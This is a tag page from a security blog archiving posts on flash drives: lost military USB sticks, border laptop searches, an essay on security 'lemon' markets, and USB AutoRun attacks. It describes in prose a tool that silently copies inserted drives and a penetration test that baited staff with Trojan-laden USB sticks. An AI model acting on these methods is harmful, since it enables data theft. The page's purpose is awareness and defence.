Entries Tagged "flash drives"

Page 2 of 3

UK Ministry of Defense Loses Memory Stick with Military Secrets

Oops:

The USB stick, outlining training for 70 soldiers from the 3rd Battalion, Yorkshire Regiment, was found on the floor of The Beach in Newquay in May.

Times, locations and travel and accommodation details for the troops were included in files on the device.

It’s not the first time:

More than 120 USB memory sticks, some containing secret information, have been lost or stolen from the Ministry of Defence since 2004, it was reported earlier this year.

Some 26 of those disappeared this year == including three which contained information classified as “secret”, and 19 which were “restricted”.

I’ve written about this general problem before: we’re storing ever more data in ever smaller devices.

The point is that it’s now amazingly easy to lose an enormous amount of information. Twenty years ago, someone could break into my office and copy every customer file, every piece of correspondence, everything about my professional life. Today, all he has to do is steal my computer. Or my portable backup drive. Or my small stack of DVD backups. Furthermore, he could sneak into my office and copy all this data, and I’d never know it.

The solution? Encrypt them.

Posted on September 16, 2008 at 6:21 AMView Comments

U.S. Government Policy for Seizing Laptops at Borders

Amazing. The U.S. government has published its policy: they can take your laptop anywhere they want, for as long as they want, and share the information with anyone they want:

Federal agents may take a traveler’s laptop or other electronic device to an off-site location for an unspecified period of time without any suspicion of wrongdoing, as part of border search policies the Department of Homeland Security recently disclosed. Also, officials may share copies of the laptop’s contents with other agencies and private entities for language translation, data decryption, or other reasons, according to the policies, dated July 16 and issued by two DHS agencies, US Customs and Border Protection and US Immigration and Customs Enforcement.

[…]

DHS officials said that the newly disclosed policies—which apply to anyone entering the country, including US citizens—are reasonable and necessary to prevent terrorism.

[…]

The policies cover ‘any device capable of storing information in digital or analog form,’ including hard drives, flash drives, cell phones, iPods, pagers, beepers, and video and audio tapes. They also cover ‘all papers and other written documentation,’ including books, pamphlets and ‘written materials commonly referred to as “pocket trash…”

It’s not the policy that’s amazing; it’s the fact that the government has actually made it public.

Here’s the actual policy.

Slashdot thread. My previous essay on crossing borders with laptops, and how to protect yourself.

Although honestly, the best thing is probably to keep your encrypted archives on some network drive somewhere, and download what you need after you cross the border.

Posted on August 1, 2008 at 12:21 PMView Comments

A Security Market for Lemons

More than a year ago, I wrote about the increasing risks of data loss because more and more data fits in smaller and smaller packages. Today I use a 4-GB USB memory stick for backup while I am traveling. I like the convenience, but if I lose the tiny thing I risk all my data.

Encryption is the obvious solution for this problem—I use PGPdisk—but Secustick sounds even better: It automatically erases itself after a set number of bad password attempts. The company makes a bunch of other impressive claims: The product was commissioned, and eventually approved, by the French intelligence service; it is used by many militaries and banks; its technology is revolutionary.

Unfortunately, the only impressive aspect of Secustick is its hubris, which was revealed when Tweakers.net completely broke its security. There’s no data self-destruct feature. The password protection can easily be bypassed. The data isn’t even encrypted. As a secure storage device, Secustick is pretty useless.

On the surface, this is just another snake-oil security story. But there’s a deeper question: Why are there so many bad security products out there? It’s not just that designing good security is hard—although it is—and it’s not just that anyone can design a security product that he himself cannot break. Why do mediocre security products beat the good ones in the marketplace?

In 1970, American economist George Akerlof wrote a paper called “The Market for ‘Lemons‘” (abstract and article for pay here), which established asymmetrical information theory. He eventually won a Nobel Prize for his work, which looks at markets where the seller knows a lot more about the product than the buyer.

Akerlof illustrated his ideas with a used car market. A used car market includes both good cars and lousy ones (lemons). The seller knows which is which, but the buyer can’t tell the difference—at least until he’s made his purchase. I’ll spare you the math, but what ends up happening is that the buyer bases his purchase price on the value of a used car of average quality.

This means that the best cars don’t get sold; their prices are too high. Which means that the owners of these best cars don’t put their cars on the market. And then this starts spiraling. The removal of the good cars from the market reduces the average price buyers are willing to pay, and then the very good cars no longer sell, and disappear from the market. And then the good cars, and so on until only the lemons are left.

In a market where the seller has more information about the product than the buyer, bad products can drive the good ones out of the market.

The computer security market has a lot of the same characteristics of Akerlof’s lemons market. Take the market for encrypted USB memory sticks. Several companies make encrypted USB drives—Kingston Technology sent me one in the mail a few days ago—but even I couldn’t tell you if Kingston’s offering is better than Secustick. Or if it’s better than any other encrypted USB drives. They use the same encryption algorithms. They make the same security claims. And if I can’t tell the difference, most consumers won’t be able to either.

Of course, it’s more expensive to make an actually secure USB drive. Good security design takes time, and necessarily means limiting functionality. Good security testing takes even more time, especially if the product is any good. This means the less-secure product will be cheaper, sooner to market and have more features. In this market, the more-secure USB drive is going to lose out.

I see this kind of thing happening over and over in computer security. In the late 1980s and early 1990s, there were more than a hundred competing firewall products. The few that “won” weren’t the most secure firewalls; they were the ones that were easy to set up, easy to use and didn’t annoy users too much. Because buyers couldn’t base their buying decision on the relative security merits, they based them on these other criteria. The intrusion detection system, or IDS, market evolved the same way, and before that the antivirus market. The few products that succeeded weren’t the most secure, because buyers couldn’t tell the difference.

How do you solve this? You need what economists call a “signal,” a way for buyers to tell the difference. Warranties are a common signal. Alternatively, an independent auto mechanic can tell good cars from lemons, and a buyer can hire his expertise. The Secustick story demonstrates this. If there is a consumer advocate group that has the expertise to evaluate different products, then the lemons can be exposed.

Secustick, for one, seems to have been withdrawn from sale.

But security testing is both expensive and slow, and it just isn’t possible for an independent lab to test everything. Unfortunately, the exposure of Secustick is an exception. It was a simple product, and easily exposed once someone bothered to look. A complex software product—a firewall, an IDS—is very hard to test well. And, of course, by the time you have tested it, the vendor has a new version on the market.

In reality, we have to rely on a variety of mediocre signals to differentiate the good security products from the bad. Standardization is one signal. The widely used AES encryption standard has reduced, although not eliminated, the number of lousy encryption algorithms on the market. Reputation is a more common signal; we choose security products based on the reputation of the company selling them, the reputation of some security wizard associated with them, magazine reviews, recommendations from colleagues or general buzz in the media.

All these signals have their problems. Even product reviews, which should be as comprehensive as the Tweakers’ Secustick review, rarely are. Many firewall comparison reviews focus on things the reviewers can easily measure, like packets per second, rather than how secure the products are. In IDS comparisons, you can find the same bogus “number of signatures” comparison. Buyers lap that stuff up; in the absence of deep understanding, they happily accept shallow data.

With so many mediocre security products on the market, and the difficulty of coming up with a strong quality signal, vendors don’t have strong incentives to invest in developing good products. And the vendors that do tend to die a quiet and lonely death.

This essay originally appeared in Wired.

EDITED TO ADD (4/22): Slashdot thread.

Posted on April 19, 2007 at 7:59 AMView Comments

USBDumper

USBDumper (article is in French; here’s the software) is a cute little utility that silently copies the contents of an inserted USB drive onto the PC. The idea is that you install this piece of software on your computer, or on a public PC, and then you collect the files—some of them personal and confidential—from anyone who plugs their USB drive into that computer. (This blog post talks about a version that downloads a disk image, allowing someone to recover deleted files as well.)

No big deal to anyone who worries about computer security for a living, but probably a rude shock to salespeople, conference presenters, file sharers, and many others who regularly plug their USB drives into strange PCs.

EDITED TO ADD (10/24): USBDumper 2.2 has been released. The webpage includes a number of other useful utilities.

Posted on August 25, 2006 at 6:47 AMView Comments

Hacking Computers Over USB

I’ve previously written about the risks of small portable computing devices; how more and more data can be stored on them, and then lost or stolen. But there’s another risk: if an attacker can convince you to plug his USB device into your computer, he can take it over.

Plug an iPod or USB stick into a PC running Windows and the device can literally take over the machine and search for confidential documents, copy them back to the iPod or USB’s internal storage, and hide them as “deleted” files. Alternatively, the device can simply plant spyware, or even compromise the operating system. Two features that make this possible are the Windows AutoRun facility and the ability of peripherals to use something called direct memory access (DMA). The first attack vector you can and should plug; the second vector is the result of a design flaw that’s likely to be with us for many years to come.

The article has the details, but basically you can configure a file on your USB device to automatically run when it’s plugged into a computer. That file can, of course, do anything you want it to.

Recently I’ve been seeing more and more written about this attack. The Spring 2006 issue of 2600 Magazine, for example, contains a short article called “iPod Sneakiness” (unfortunately, not on line). The author suggests that you can innocently ask someone at an Internet cafe if you can plug your iPod into his computer to power it up—and then steal his passwords and critical files.

And here’s an article about someone who used this trick in a penetration test:

We figured we would try something different by baiting the same employees that were on high alert. We gathered all the worthless vendor giveaway thumb drives collected over the years and imprinted them with our own special piece of software. I had one of my guys write a Trojan that, when run, would collect passwords, logins and machine-specific information from the user’s computer, and then email the findings back to us.

The next hurdle we had was getting the USB drives in the hands of the credit union’s internal users. I made my way to the credit union at about 6 a.m. to make sure no employees saw us. I then proceeded to scatter the drives in the parking lot, smoking areas, and other areas employees frequented.

Once I seeded the USB drives, I decided to grab some coffee and watch the employees show up for work. Surveillance of the facility was worth the time involved. It was really amusing to watch the reaction of the employees who found a USB drive. You know they plugged them into their computers the minute they got to their desks.

I immediately called my guy that wrote the Trojan and asked if anything was received at his end. Slowly but surely info was being mailed back to him. I would have loved to be on the inside of the building watching as people started plugging the USB drives in, scouring through the planted image files, then unknowingly running our piece of software.

There is a defense. From the first article:

AutoRun is just a bad idea. People putting CD-ROMs or USB drives into their computers usually want to see what’s on the media, not have programs automatically run. Fortunately you can turn AutoRun off. A simple manual approach is to hold down the “Shift” key when a disk or USB storage device is inserted into the computer. A better way is to disable the feature entirely by editing the Windows Registry. There are many instructions for doing this online (just search for “disable autorun”) or you can download and use Microsoft’s TweakUI program, which is part of the Windows XP PowerToys download. With Windows XP you can also disable AutoRun for CDs by right-clicking on the CD drive icon in the Windows explorer, choosing the AutoPlay tab, and then selecting “Take no action” for each kind of disk that’s listed. Unfortunately, disabling AutoPlay for CDs won’t always disable AutoPlay for USB devices, so the registry hack is the safest course of action.

In the 1990s, the Macintosh operating system had this feature, which was removed after a virus made use of it in 1998. Microsoft needs to remove this feature as well.

EDITED TO ADD (6/12): In the penetration test, they didn’t use AutoRun.

Posted on June 8, 2006 at 1:34 PMView Comments

Deniable File System

Some years ago I did some design work on something I called a Deniable File System. The basic idea was the fact that the existence of ciphertext can in itself be incriminating, regardless of whether or not anyone can decrypt it. I wanted to create a file system that was deniable: where encrypted files looked like random noise, and where it was impossible to prove either the existence or non-existence of encrypted files.

This turns out to be a very hard problem for a whole lot of reasons, and I never pursued the project. But I just discovered a file system that seems to meet all of my design criteria—Rubberhose:

Rubberhose transparently and deniably encrypts disk data, minimising the effectiveness of warrants, coersive interrogations and other compulsive mechanims, such as U.K RIP legislation. Rubberhose differs from conventional disk encryption systems in that it has an advanced modular architecture, self-test suite, is more secure, portable, utilises information hiding (steganography / deniable cryptography), works with any file system and has source freely available.

The devil really is in the details with something like this, and I would hesitate to use this in places where it really matters without some extensive review. But I’m pleased to see that someone is working on this problem.

Next request: A deniable file system that fits on a USB token, and leaves no trace on the machine it’s plugged into.

Posted on April 18, 2006 at 7:17 AMView Comments

Risks of Losing Portable Devices

Last July I blogged about the risks of storing ever-larger amounts of data in ever-smaller devices.

Last week I wrote my tenth Wired.com column on the topic:

The point is that it’s now amazingly easy to lose an enormous amount of information. Twenty years ago, someone could break into my office and copy every customer file, every piece of correspondence, everything about my professional life. Today, all he has to do is steal my computer. Or my portable backup drive. Or my small stack of DVD backups. Furthermore, he could sneak into my office and copy all this data, and I’d never know it.

This problem isn’t going away anytime soon.

There are two solutions that make sense. The first is to protect the data. Hard-disk encryption programs like PGP Disk allow you to encrypt individual files, folders or entire disk partitions. Several manufacturers market USB thumb drives with built-in encryption. Some PDA manufacturers are starting to add password protection—not as good as encryption, but at least it’s something—to their devices, and there are some aftermarket PDA encryption programs.

The second solution is to remotely delete the data if the device is lost. This is still a new idea, but I believe it will gain traction in the corporate market. If you give an employee a BlackBerry for business use, you want to be able to wipe the device’s memory if he loses it. And since the device is online all the time, it’s a pretty easy feature to add.

But until these two solutions become ubiquitous, the best option is to pay attention and erase data. Delete old e-mails from your BlackBerry, SMSs from your cell phone and old data from your address books—regularly. Find that call log and purge it once in a while. Don’t store everything on your laptop, only the files you might actually need.

EDITED TO ADD (2/2): A Dutch army officer lost a memory stick with details of an Afgan mission.

Posted on February 1, 2006 at 10:32 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.